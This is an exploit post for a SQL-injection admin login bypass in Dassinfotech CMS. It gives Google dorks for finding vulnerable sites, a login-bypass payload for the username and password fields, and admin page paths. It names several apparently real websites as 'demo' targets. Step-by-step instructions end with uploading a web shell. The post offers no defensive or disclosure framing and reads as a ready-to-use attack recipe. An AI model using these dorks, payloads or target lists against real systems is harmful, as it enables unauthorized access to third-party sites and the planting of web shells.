# Exploit Title : Dassinfotech CMS SQL Injection Bypass Admin Vulnerability
# Exploit Author : Xmall75
# Vendor Homepage : www.dassinfotech.com
# Date : 24 / 05 / 2020
# Tested on : Windows 7
# Dork :
intext:Design by Dassinfotech.com
inurl:detailsnews.php?id=
# SQL Injection :
www.target.com/detailsnews.php?id=your payload.
# Payload U / P : '=''or' / '=''or'
# Admin Page :
www.target.com/matri/login.php
www.target.com/india/login.php
# Demo :
www.vkbpl.in/india/login.php
www.samacharvarta.com/matri2/login.php
www.twodaughtersclub.com/india/login.php
www.patrakarbaba.com/india/login.php
# Step :
- Dorking on the Google.
- Open the admin page.
- Fill the username and password using the payload that i gave.
- Upload your shell.
- Crot.
# xmall75@gmail.com